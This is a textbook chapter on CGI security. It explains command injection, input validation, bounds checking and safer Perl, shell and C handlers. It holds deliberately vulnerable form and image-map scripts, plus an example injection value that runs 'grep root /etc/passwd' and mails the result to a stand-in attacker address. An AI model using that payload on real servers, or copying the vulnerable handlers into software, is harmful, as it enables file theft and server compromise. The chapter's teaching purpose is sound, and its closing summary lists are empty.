Computers on a public network like the Internet can be vulnerable to misuse by malicious network users, or crackers. CGI is another Internet mechanism that can and must be deployed with security issues in mind.
At the time of the writing of this chapter, a significant proportion of the announcements on the Internet security mailing lists and bulletin boards describe CGI-related security problems. Subscribers could easily get the impression that CGI represents a security risk to any organization that employs it. Is this fear justified?
The Common Gateway Interface specification is not insecure per se. The specification defines a way for World Wide Web servers to interact with query engines and information gateways. It entails the use of environment variables and standard input and output streams, none of which are fundamentally vulnerable. It is not the interface that is insecure.
However, CGI represents a powerful feature of many Web servers. This feature allows a Web server not only to provide information, but also to provide access to the computing power of the server. It is important to note that a Web server that supports CGI gateway engines also gives Web browser users a degree of control over what the Web server does.
Careful use of CGI can deliver interactive Web sites, user-friendly information retrieval, and access to information not designed for the World Wide Web. This is achieved by allowing the Web browser user to control the information delivery and by implementing automatic translation of data from one form to another.
Careless use of CGI can and will compromise the security of the information provider. A CGI application implemented without due regard to security issues will allow the Web browser user much more control over the Web server than the programmer intended. If an organization is complacent about the security of its World Wide Web server, it should expect abuse of its computing facilities, downtime due to malicious attacks, and loss of information integrity or confidentiality.
Security vulnerabilities result from programming or implementation that does not guard against accidental or deliberate misuse. An example of this is a typical CGI gateway for accepting data typed into a World Wide Web form and passing it on as an e-mail message, as shown in Listing 9.1.
Listing 9.1. An insecure HTML form handler.
#!/usr/local/bin/perl
# formmail.cgi
# Accepts form submission and resends as an e-mail message to "webweaver"
# Call library routine to translate and split form submission
# into perl variables $input{"field"}
require "cgi.pl";
# Launch e-mail application "/bin/mail" with Subject: header from the "formname" field
open (MAIL, "|/bin/mail -s ' ".$input{"formname"}." ' webweaver");
# And send "formcontents" field as the body of the message
print MAIL $input{"formcontents"};
close(MAIL);
exit(0);
This CGI gateway program will do what the programmer intended for most form submissions. It sends the form contents to the e-mail address "webweaver" using the auxiliary program /bin/mail.
However, this apparently simple and benign gateway could be a security loophole because it does no checking on the user-supplied form data before passing it to the mail program. Notice what happens to the user-submitted data. A library module, cgi.pl, unpacks the form submission, restoring any characters that have been rewritten for safety by the Web browser or Web server. The program then uses that information in a command interpreter to launch another program, /bin/mail. The data from the form field "formname" is passed unchecked to a command interpreter as an argument to the /bin/mail command. Then the data from the form field "formcontents" is passed unchecked as input to the auxiliary mail program.
The security vulnerability arises because command interpreters and several other applications assign special meanings to certain characters in their input. If the Web form user maliciously or even innocently included such special characters in either form field, the form submission could have side effects that the programmer did not anticipate. A malicious Web user could include operating system commands in either form field, and by surrounding them with appropriate special characters, have them run on the Web server. These commands could damage data integrity or allow the Web user unauthorized access to data on the Web server. They might even be used to give the user full control of the Web server.
For example, the cracker might construct a form submission in which the "formname" field is set to
'`grep root /etc/passwd` cracker@illegal.org #'
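The leading quote character closes the quoted subject, the backquoted grep command runs on the server and its output is substituted into the mail command line, the message is addressed to the cracker, and the # character turns the rest of the line, including the intended recipient, into a comment. This CGI gateway program is a security hole waiting to be hacked, simply because the programmer failed to check the user-supplied data before passing it on to other programs.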
Other security vulnerabilities can arise from assuming that the "conversation" between the Web browser and the Web server is private. Inviting the user to enter secret passwords, credit card numbers, and other confidential information puts the confidentiality of that information at risk. The Internet is a public network. World Wide Web form submissions are usually unencrypted. It is possible that the information in the form submission could be captured and read somewhere between the browser and server.
The mechanisms that make up the Internet are themselves less secure than some Internet users realize. For instance, there is no easy way to prove that an Internet electronic mail message is genuine. Forging mail messages that appear to come from one person but actually come from someone else is trivial, especially now that more and more Internet users install and configure their own e-mail applications. Internet data streams purporting to come from one source can be spoofed or hijacked by skilled crackers. These are not insecurities in CGI but should be taken into account in any assessment of the security of CGI.
Some Web servers use proprietary interfaces as an alternative to CGI. While these may be claimed to be more secure than the CGI system, they often limit what the gateway programmer can do or allow just as much misuse.
Some Web browsers support secure network communications, interactive and programmable features such as built-in browser control scripting languages, or even full network application systems. These can be used to add a level of security to CGI, or even to achieve similar results but with browser-side processing instead of server-side handling. However, an information provider exploiting these features will bar access to the information for users with other browsers.
Despite the dangers described previously, if the Web information service implementors design their implementation to guard against potential misuse, a CGI gateway can be profitable and useful without introducing security vulnerabilities.
The implementors of a Web service are jointly responsible for CGI security, but the defensive weapons in their armory differ according to their role.
The system administrator of a Web server can do much to defend against CGI misuse, as detailed in the following sections.
The administrator should discuss with programmers all CGI-based implementations and security risks. Together they can share information on known security problems with server software and establish codes of practice that reduce the risk from attacks. They could also implement a process of peer review through which programmers review each other's code for possible security vulnerabilities.
Security concerns should influence the choice of Web server software. Both the HTTP server and any other off-the-shelf server software, such as CGI libraries and gateways, should be selected with care. Read the release notes for the software and regularly check the Web "home page" for the server software for information about security problems and new versions. Where possible, use the most recent stable version of the software. Don't be tempted to implement "beta-release" software by the promise of new features. Security vulnerabilities are often found in "beta" software and fixed only in the production release. Subscribe to any Web-related mailing lists and security bulletin boards where server security problems are discussed.
If the intended audience for your Web site uses a specific set of machines, perhaps within one organization, it may be possible to restrict access to your Web server to allow connections from only those machines. This can be achieved through the scoping features of certain Web servers, using "access.conf" or ".htaccess" files, for example. The same or better protection can also be provided at the network level by using TCP/IP wrapper software or router access control lists.
On Web servers that do not make use of CGI gateways, the administrator should disable the CGI functionality altogether. If CGI gateways are needed, the administrator can often restrict the CGI functionality to a specific part of the Web site or deny CGI functionality to all but the trusted users. This may mean that CGI access is allowed from browsers within your organization to the CGI development area, but World Wide Web users on the Internet as a whole are allowed access only to tested and trusted CGI gateways.
Administrators should take the time to carefully read the source code and release notes for CGI gateways before they are installed. This advice applies not only to CGI programs developed in-house, but also to freely available CGI code. Security vulnerabilities are often discovered in public domain server software after it has been released. An administrator should also follow the Internet mailing lists and Usenet newsgroups that discuss the software concerned for news of possible security problems.
If the operating system or Web software on your server will allow, ensure that CGI programs are run in a protected environment. On multiuser operating systems, set up your server to run as a nonprivileged user, preferably a user specifically for that purpose. Under networked operating systems, there may already be a nonprivileged account known as "nobody," but where possible use a different account specifically for running CGI programs.
If possible, run the CGI program in a virtual emulated machine, or in a subsection of the server's file system so that it cannot see the rest of the server files.
Caution
Do not run the Web server with super-user privileges. If a malicious intruder finds a security vulnerability in the Web server software, that intruder will immediately have full control of the server. Avoid CGI wrapper software that gives CGI programs the same privileges as the author of the CGI script. Such a wrapper merely lends extra power to the intruder who exploits any CGI security vulnerabilities. If a CGI gateway cannot access information as an untrusted user, this should prompt the implementor to reassess the availability of the information, not the privileges of the CGI gateway.
Choose a machine to be the CGI server that does not hold any secure information and that is not generally trusted by other network hosts. This need not even be your main Web server; setting aside a machine exclusively as a CGI server simplifies the security problem. If your organization uses a firewall gateway or router, position your CGI server outside this firewall to limit the advantages of an intruder who succeeds in exploiting a CGI security hole. Do not host the CGI scripts on the firewall gateway itself, because a security infiltration could compromise the whole organization.
If possible, set the priority of CGI programs lower than other processes in a multiprocessing environment. This will limit the damage caused by malicious or accidental floods of CGI requests that might otherwise have disabled the CGI server.
Security vulnerabilities and improved versions of server software are often announced and discussed in the Internet discussion groups. Information from software suppliers and other users can be invaluable.
The author of a CGI gateway program can also do much to defend against security breaches, as outlined in the following sections.
The programmer should discuss with Web server system administrators all CGI-based implementations and security risks. Together they can establish codes of practice that reduce the risk from attacks. They could also implement a process of peer review through which programmers review each other's code for possible security vulnerabilities.
When choosing CGI toolkits and library software, examine and test them for possible security vulnerabilities. Read the release notes for the software and regularly check the Web "home page" for the library software for information about security problems and new versions. Where possible, use the most recent stable version of the software. Don't be tempted to implement "beta-release" software by the promise of new features. Security vulnerabilities are often found in "beta" software and fixed only in the production release. Subscribe to any Web-related mailing lists and security bulletin boards where CGI security problems are discussed.
If the intended audience for your application uses a specific set of machines, perhaps within one organization, it may be possible to restrict access to your CGI gateway to allow connections from only those machines. This can be achieved either through the scoping features of certain Web servers, or by checking the REMOTE_HOST environment variable.
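As a rough illustration of the REMOTE_HOST check, the C sketch below tests whether a host name belongs to a given domain. The function name host_in_domain and the domain example.org are hypothetical, chosen only for this example.

```c
#include <assert.h>
#include <string.h>

/* Return 1 if host is exactly domain or ends in "." followed by domain.
   The comparison is case-sensitive for brevity; the sketch assumes the
   server reports host names in lower case. */
int host_in_domain(const char *host, const char *domain) {
    size_t hlen, dlen;

    assert(domain != NULL && *domain != '\0');  /* programmer-supplied */
    if (host == NULL)
        return 0;
    hlen = strlen(host);
    dlen = strlen(domain);
    if (hlen < dlen || strcmp(host + (hlen - dlen), domain) != 0)
        return 0;
    /* Require a label boundary so "evilexample.org" does not match
       "example.org". */
    return hlen == dlen || host[hlen - dlen - 1] == '.';
}
```

A gateway might call host_in_domain(getenv("REMOTE_HOST"), "example.org") and refuse the request when the result is 0. Some servers leave REMOTE_HOST unset when no host name is available, which is why a missing value is treated as a failure here.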
If you have a small number of known users for your application and the Web server you are working with has support for HTTP password authentication, you might choose to implement a username and password scheme to restrict access to the CGI gateway to the trusted set of users. This is not a substitute for careful coding, but it allows the programmer to put less emphasis on defending against malicious attacks or unauthorized use.
If you are writing software for any public network service, it is safest to believe that they are out to get you. Even if you consider the data you are handling to be public and your organization to be unattractive to crackers, remember that there are groups of people on the Internet who derive all their self-actualization from finding the security holes in your software, gaining unauthorized access to your computers and disrupting your network service, wasting the time and effort of you and your colleagues. Program defensively.
It is dangerous to make assumptions about the data that will be presented to a CGI program by the Web server.
Beware of assuming that the data is a submission from your form. Anyone can point a Web form at your CGI gateway, or generate an HTTP request that looks like a form submission but contains unsafe data.
The example attack on Listing 9.1 (formmail.cgi) would probably be made over a raw, interactive HTTP connection opened by the cracker. It supplies an unexpected value to a form field that the form designer probably intended to be hidden from the Web user.
Beware of assuming that the data submitted is small enough to fit where you want it to fit. Whatever limitations you include in a Web form, a faulty Web browser or a wily cracker will easily get around them and attempt to crash or abuse your system by sending more data than you expected.
Beware of assuming that special characters in the data have been encapsulated by the browser using the %hh hexadecimal escape sequence. Browsers may not implement this convention, and crackers may easily circumvent it.
Many discussions of CGI security attempt to address the problem of characters in the query or submission that have special meanings.
Command interpreters and other simple interpreted languages are the most common victims. Characters like backquote ("`"), backslash ("\"), and dollar ("$") are interpreted as part of the interpreted language and can be exploited to trick the CGI gateway into running commands for a cracker on the Web server.
Other tools and even the operating system itself can be abused. Some useful applications will execute arbitrary commands if given the wrong input. ASCII control characters (those with decimal codes less than 32) can be used to disrupt text files where user supplied form or query data is logged.
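One way to protect a log file from control characters is sketched below in C. It keeps only printable ASCII (codes 32 to 126) and replaces everything else, which also discards accented ISO-Latin-1 letters; that restriction and the function name keep_printable_ascii are assumptions made for this illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Replace, in place, every byte outside the printable ASCII range
   32..126 with '?'. Returns the number of bytes replaced. */
size_t keep_printable_ascii(char *text) {
    size_t replaced = 0;
    unsigned char c;

    assert(text != NULL);               /* programmer-supplied buffer */
    for (; *text != '\0'; text++) {
        c = (unsigned char)*text;
        if (c < 32 || c > 126) {
            *text = '?';
            replaced++;
        }
    }
    return replaced;
}
```

With this in place, a submission containing an end-of-line character can no longer start a forged entry on a new line of the log.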
Unfortunately, the most common defense is to try to compile a list of special characters and to guard against or exclude only those characters. This piecemeal approach is risky at best. The lists, like politicians' speeches, are more interesting for what they omit than for what they include. The listed characters are typically stripped from queries or form submissions because they have special meanings to command interpreters. Recently, several Web servers had to be rewritten to also defend against the inclusion of "end-of-line" characters in search queries, as these are treated as special by many operating system operations.
A more satisfactory defense is to reduce the submitted input to a small set of acceptable characters. This set of characters will vary from application to application. For instance, a person's name could be restricted to upper- and lowercase letters (including the accented letters in the upper-half of the ISO-Latin-1 character set), spaces, hyphens, and apostrophes. With this analysis, the programmer will immediately discover that it is not possible to pass a person's name to a command interpreter wrapped in single quote characters because the single quote character (or apostrophe) can reasonably form part of someone's name.
The key technique is to choose a set of characters to accept, not to choose a set of characters to reject. The choice of acceptable input characters will be influenced by the intended use. If the input is to be passed as part of a command to the operating system command interpreter (as in Listing 9.1), programmers must find out whether any of the characters they would like their CGI program to accept have a special meaning to the operating system or to the other command.
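The accept-list idea can be sketched in a few lines of C. The character set NAME_CHARS and the function is_acceptable are hypothetical; a real application would choose its own set, and the accented ISO-Latin-1 letters are left out here only to keep the sketch short.

```c
#include <assert.h>
#include <string.h>

/* Characters this hypothetical application accepts in a personal name. */
const char NAME_CHARS[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    " -'";

/* Return 1 if value is non-empty and every character in it appears in
   allowed, otherwise 0. */
int is_acceptable(const char *value, const char *allowed) {
    assert(allowed != NULL);            /* programmer error, not user error */
    if (value == NULL || *value == '\0')
        return 0;
    /* strspn gives the length of the leading run of allowed characters;
       the value passes only if that run covers the whole string. */
    return strspn(value, allowed) == strlen(value);
}
```

Because the function names what is allowed rather than what is forbidden, a character nobody thought to worry about is rejected by default.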
Choose criteria by which you can validate the query or form submission. For instance, if the user has been asked to supply an Internet e-mail address, reject a submission that does not conform to the relevant Internet standards. You may even choose to validate the supplied e-mail address by sending a secret password to the address and insisting on the password for future submissions. Be prepared to have your program handle garbage input, empty input, random input, prank submissions, and malicious attacks.
Choose limitations on the size and structure of acceptable input. It is easy to assume that a prompt for a name will yield a response small enough to fit into the available memory of the Web server, but there is no reason why it should. A malicious attacker could send several megabytes of binary data where you expected a personal name. Careless handling of a "denial of service" attack like this could lead to Web server downtime or even software damage. If you requested a single line of text, reject submissions containing end-of-line characters. If a Web form includes selection lists or checkboxes, reject any data submitted that is not formed from the options presented to the user.
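The size and structure checks might look something like the following C sketch. It assumes the gateway reads the CONTENT_LENGTH environment variable before reading any form data; the function names and the idea of passing the limit as a parameter are choices made for this example.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Parse the text of the CONTENT_LENGTH environment variable.
   Returns the length, or -1 if the text is missing, is not a plain
   decimal number, or exceeds max_len. */
long checked_content_length(const char *text, long max_len) {
    char *end;
    long len;

    assert(max_len >= 0);               /* limit chosen by the programmer */
    if (text == NULL || *text < '0' || *text > '9')
        return -1;                      /* rejects "", "-5", " 12", "+3" */
    errno = 0;
    len = strtol(text, &end, 10);
    if (errno != 0 || *end != '\0' || len > max_len)
        return -1;
    return len;
}

/* Return 1 if value contains no carriage return or line feed. */
int is_single_line(const char *value) {
    return value != NULL && strcspn(value, "\r\n") == strlen(value);
}
```

A gateway would refuse the request outright when checked_content_length(getenv("CONTENT_LENGTH"), limit) returns -1, before allocating memory or reading any input.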
The data supplied by a user in a form submission or query should be treated as "contaminated" until it has been cleaned of potentially dangerous special characters.
The example program in Listing 9.1 passed data submitted from a form unchecked to the operating system command interpreter and to an e-mail application. A cracker suspecting this could have easily included quote characters in the form submission that could direct the command interpreter to run any command the cracker chose. The cracker might equally have chosen to exploit the e-mail application that might be similarly persuaded to run commands with the use of an escape character or exclamation mark.
The program might have been more safely written in the manner shown in Listing 9.2.
Listing 9.2. A more secure HTML form handler.
#!/usr/local/bin/perl
# formfile.cgi
# Accepts form submission and logs to a file for later use
# Call library routine to translate and split form submission
# into perl variables $input{"field"}
# the library routine limits the size and content of the input
# to a length and to characters considered safe
require "safecgi.pl";
# Open the log file for "append". Do not pass the form contents to any operating system routine
open (FILE, ">>/home/webweaver/form.log");
# Write some key headers for this message
print FILE "Script:".$ENV{"SCRIPT_NAME"}."\n";
print FILE "Host: ".$ENV{"REMOTE_HOST"}."(".$ENV{"REMOTE_ADDR"}.")\n";
print FILE "Date: ".`/bin/date`;
# And write the form data into the file
print FILE $input{"formcontents"}."\n";
close(FILE);
exit(0);
In the program in Listing 9.2, no user data is passed to be reinterpreted by an operating system command or any other program. It is simply written to a file for examination by a "safe" file browser later. The user data never contaminates any operating system command or operation.
CGI programming languages that permit the reinterpretation of variables as program code, such as scripting languages and command interpreters with an eval function, pose the extra problem of user data potentially contaminating the CGI program itself. Care should be taken to avoid passing unchecked user data to any interpreter, explicitly or implicitly.
Some programming languages include features to make the tracking of unchecked or "contaminated" data easier. For instance, the Perl scripting language supports "taint" checking, which helps to identify unchecked data before the program is used. Nevertheless, for most applications, the programmer should attempt to design a clear demarcation between unchecked and validated user data. This might be a variable naming scheme, perhaps where the unchecked data is kept in variables whose names begin with the word "raw" and are transferred upon validation and safety checking to variables beginning with the word "cooked." Alternatively, it might be a logical demarcation in the program's structure where the raw data is available only in the routines that accept the user input and is passed to the rest of the program after rigorous checking.
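In a compiled language, the "raw" and "cooked" demarcation can be pushed into the type system. The C sketch below is one possible arrangement, not a standard idiom; the type names, the 40-character limit, and the accepted character set are all assumptions for illustration.

```c
#include <assert.h>
#include <string.h>

#define NAME_MAX_LEN 40   /* illustrative limit */

/* Unchecked data as it arrived from the form. */
struct raw_field   { const char *text; };
/* Data that has passed validation. Only cook_name() fills this in. */
struct cooked_name { char text[NAME_MAX_LEN + 1]; };

/* Validate raw against a length limit and a set of acceptable characters.
   On success copy it into out and return 0; otherwise return -1 and
   leave out holding an empty string. */
int cook_name(const struct raw_field *raw, struct cooked_name *out) {
    static const char ok[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -'";
    size_t len;

    assert(raw != NULL && out != NULL);
    out->text[0] = '\0';
    if (raw->text == NULL)
        return -1;
    len = strlen(raw->text);
    if (len == 0 || len > NAME_MAX_LEN || strspn(raw->text, ok) != len)
        return -1;
    memcpy(out->text, raw->text, len + 1);
    return 0;
}
```

If the rest of the program accepts only struct cooked_name pointers, the compiler will complain when a struct raw_field is passed where validated data is expected.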
Many interpreted programming languages have inherent limitations in the size of some variable data types. It is also difficult to handle data of an arbitrary size in many compiled languages. For some tools and applications, the programmer will accept the risk of choosing a maximum reasonable size for user-supplied data and might not even check that the user-supplied data is small enough to fit in the storage space set aside for it.
When the application is being made available to anyone and everyone on the Internet, array bounds checking cannot be ignored. It is important that the CGI programmer chooses reasonable limits for the size of the expected input and checks that the programming system being used can accommodate those sizes. The programmer must then ensure that any user-supplied data larger than that limit is rejected or ignored. Dynamically allocating as much memory as the user data would fill runs the risk of exhausting the memory of the Web server to the detriment of the Web service. Allowing user-supplied data to over-run a fixed buffer size can cause operating system crashes or can even be exploited to gain unauthorized access to the Web server itself. Recently, crackers have successfully abused poor array bounds checking in Web server software to substitute their own executable program code for the server code in memory.
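A bounds-checked copy into a fixed buffer can be as small as the C sketch below. The FIELD_MAX value and the function name copy_bounded are illustrative, and rejecting oversized input instead of truncating it is a design choice made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define FIELD_MAX 64   /* illustrative limit, chosen by the programmer */

/* Copy src into dst only if it fits, including the terminating NUL.
   Returns 0 on success; returns -1 and leaves dst as an empty string
   if src is missing or too long. Nothing is ever written past
   dst[dst_size - 1]. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t len;

    assert(dst != NULL && dst_size > 0);
    dst[0] = '\0';
    if (src == NULL)
        return -1;
    len = strlen(src);
    if (len >= dst_size)
        return -1;                      /* reject rather than truncate */
    memcpy(dst, src, len + 1);
    return 0;
}
```

A caller declares char field[FIELD_MAX] and treats a return value of -1 as grounds for refusing the whole submission.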
This is a particular problem if a cracker is able to trick the Web server into delivering the CGI program itself as a Web document rather than its results. The cracker can then "reverse-engineer" the program to determine its weaknesses. Web server software often announces the hardware and operating system platform on which it is running, and Web sites sometimes include this information in Web pages. If a cracker knows what platform the Web server is running under, the cracker can exploit these vulnerabilities more easily.
A CGI gateway is likely to be more secure if it behaves like a pure filter, that is if it does not do different things with different user-supplied data. If there is one normal execution path through the CGI code, it is much easier to track which user data has been validated and which is still "contaminated." The CGI program is simply a filter. If the program takes different execution paths depending on the data supplied, there are many more possibilities to test. In this latter case, the CGI program is behaving like an interpreter, and the canny cracker may be able to construct input that has side effects the programmer could not anticipate due to the complexity of the program.
The security vulnerabilities in the program in Listing 9.1 were mainly associated with passing the user supplied data to other programs. To launch the mail application, the CGI gateway implicitly used a command interpreter in the following statement:
open (MAIL, "|/bin/mail -s ' ".$input{"formname"}." ' webweaver");
Part of the form data is included in the command. A cracker could have included any data in the form, including the character sequences necessary to cause the command interpreter to run any command the cracker wishes. Then the rest of the form data is passed as input to the mail application. Also, no allowance is made for the possibility that some input to the mail application could cause arbitrary commands to be launched.
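The command interpreter can be taken out of the picture by launching the auxiliary program directly. The C sketch below is a different technique from the Perl open in Listing 9.1, shown only for illustration: it builds an argument vector and uses fork and execv, so the subject reaches /bin/mail as a single argument whatever characters it contains. The function names are hypothetical, the piping of the message body to the child is omitted, and the mail program's own handling of its input remains a separate concern.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fill argv (room for 5 pointers) for: /bin/mail -s <subject> <recipient>.
   No quoting is needed because no shell will parse these strings. */
void build_mail_argv(const char *argv[5], const char *subject,
                     const char *recipient) {
    argv[0] = "/bin/mail";
    argv[1] = "-s";
    argv[2] = subject;
    argv[3] = recipient;
    argv[4] = NULL;
}

/* Run argv[0] with the given arguments and wait for it to finish.
   Returns the program's exit status, 127 if it could not be started,
   or -1 on any other failure. */
int run_argv(const char *const argv[]) {
    int status;
    pid_t pid;

    assert(argv != NULL && argv[0] != NULL);
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: replace this process with the program. The cast only
           satisfies execv's prototype; the strings are not modified. */
        execv(argv[0], (char *const *)argv);
        _exit(127);                     /* reached only if execv failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With this arrangement the backquotes and quote characters from the earlier attack string would simply appear in the Subject: header of the message.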
The simplest way to avoid this kind of security vulnerability is to never pass the user data to any other programs. The CGI program in Listing 9.2 demonstrates this approach. Rather than using the mail command, the form data is simply logged to a file. A CGI programmer who is accustomed to the toolkit approach of calling many other utilities as modules in a program must either design a simpler self-contained pure filter or learn what the various utilities do when given any arbitrary input.
If the CGI gateway simply must pass the user-supplied data onto some other program, the gateway should first rewrite the dangerous characters in the data to prevent any undesirable side-effects. The programmer must choose a set of characters or an input language that will always have the expected effect in the auxiliary program and then force the user-supplied data into this form. However, in doing so the programmer must not introduce any extra security problems by reinterpreting the user data in the current program. Command scripting languages pose a particular problem here, as it is difficult to refer to the raw CGI environment variables without reinterpreting them in the context of the scripting language. Listing 9.3 is an example IMAGE MAP script that demonstrates the problem.
Listing 9.3. An insecure IMG ISMAP handler.
#!/bin/sh
# Clicking on the map.gif image sends the pixel coordinates as x,y
# in the QUERY_STRING environment variable
# Check for valid coordinates
if echo $QUERY_STRING | egrep '^[0-9][0-9]*,[0-9][0-9]*$' >/dev/null
then
# Send a magnified portion of the image
echo "Content-type: image/gif"
echo ""
zoom $QUERY_STRING map.gif
else
# Send an error message
echo "Content-type: text/html"
echo ""
echo "Picture Zoom Error: Invalid pixel coordinates passed"
fi
Observe in Listing 9.3 that the user query in the QUERY_STRING environment variable is expanded as part of the command
echo $QUERY_STRING
and could have undesirable side-effects if it contained special characters.
A safer implementation would be the script in Listing 9.4:
Listing 9.4. A more secure IMG ISMAP handler.
#!/bin/sh
# Clicking on the map.gif image sends the pixel coordinates as x,y
# in the QUERY_STRING environment variable
# Check for valid coordinates
if /bin/env >/dev/null 2>&1 && /bin/env | /bin/egrep '^QUERY_STRING=[0-9][0-9]*,[0-9][0-9]*$' >/dev/null 2>&1
then
# Send a magnified portion of the image
/bin/echo "Content-type: image/gif"
/bin/echo ""
/usr/local/bin/zoom $QUERY_STRING map.gif
else
# Send an error message
/bin/echo "Content-type: text/html"
/bin/echo ""
/bin/echo "Picture Zoom Error: Invalid pixel coordinates passed"
fi
The program in Listing 9.4 does not use the environment variable in a command until it has been safely checked by parsing the output of a command /bin/env, which dumps the whole set of environment variables without reinterpreting them. The first invocation of /bin/env is to ensure that the command does not find any unexpected problems with the environment variables such as unsupported variable names. The second invocation passes the user supplied data to a format checker without passing it through the command interpreter. This technique is not completely safe. It assumes that the /bin/env command will terminate with an error if any environment variable contains an "end-of-line" character or some other control code. However, not all systems have this capability.
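In a compiled language the difficulty largely disappears, because reading an environment variable does not reinterpret its contents. The C sketch below validates an "x,y" query of the kind used by the image map scripts; the function names and the five-digit limit on each coordinate are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Parse one run of 1 to 5 decimal digits starting at *p. On success
   store the value, advance *p past the digits and return 1. */
static int parse_number(const char **p, int *value) {
    int digits = 0, n = 0;

    while (**p >= '0' && **p <= '9' && digits < 5) {
        n = n * 10 + (**p - '0');
        (*p)++;
        digits++;
    }
    if (digits == 0)
        return 0;
    *value = n;
    return 1;
}

/* Accept exactly "x,y". Returns 1 with *x and *y filled in, or 0 if the
   query is missing or contains anything else (in which case *x and *y
   should not be used). */
int parse_coords(const char *query, int *x, int *y) {
    const char *p = query;

    assert(x != NULL && y != NULL);
    if (p == NULL || !parse_number(&p, x))
        return 0;
    if (*p != ',')
        return 0;
    p++;
    if (!parse_number(&p, y))
        return 0;
    return *p == '\0';                  /* nothing may follow the y value */
}
```

A gateway would call parse_coords(getenv("QUERY_STRING"), &x, &y) and work only with the two integers from then on, so an embedded end-of-line or shell character never reaches another program.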
Writing code that checks for individual dangerous input characters on a case-by-case basis is difficult to maintain and test. Writing a general reusable validator is a good investment. Something like the C procedure in Listing 9.5 can be used again and again. It takes as its arguments two pointers to null-terminated character strings and returns the first pointer with its contents rewritten to remove any characters not in the second string.
Listing 9.5. Stripping unwanted characters in C.
#ifndef MAX_UCHAR
# define MAX_UCHAR (255)
#endif
typedef unsigned char uchar;

/* Remove from string, in place, every character not listed in chrs. */
char *stripchrs(char *string, const char *chrs) {
    char acceptable[MAX_UCHAR + 1], *chr, *pos;
    const char *ok;
    int chrnum;

    if (!string) return(string);
    /* Build a 256 entry table of flags for whether a particular character */
    /* is acceptable or not. */
    for (chrnum = 0; chrnum <= MAX_UCHAR; chrnum++) acceptable[chrnum] = 0;
    for (ok = chrs; ok && *ok; ok++) acceptable[(uchar)*ok] = 1;
    /* Step through the string copying only acceptable characters. */
    /* pos advances only when the character just copied is acceptable. */
    for (chr = string, pos = string; *chr; chr++) {
        *pos = *chr;
        pos += acceptable[(uchar)*chr];
    }
    *pos = '\0';
    return(string);
}
Even if you are aware of a potential security vulnerability in a program, do not annotate the program with a comment describing the security hole. Many Web servers can be fooled into delivering the CGI program itself as a Web document instead of running it. A comment in the code is a gift to the potential cracker.
When writing your CGI program, follow the paths that the user-supplied data takes through the program and check that no user-supplied data influences the running of the server until it has been rendered harmless.
When testing your CGI program, try to think of ways to break the program. Send it garbage input, input that contains special characters that attempt to execute commands on the server, input that is much longer than usual, empty input, and even random input. Check what happens if two instances of your CGI program run in parallel.
The main things to remember from this chapter are as follows:
And most importantly: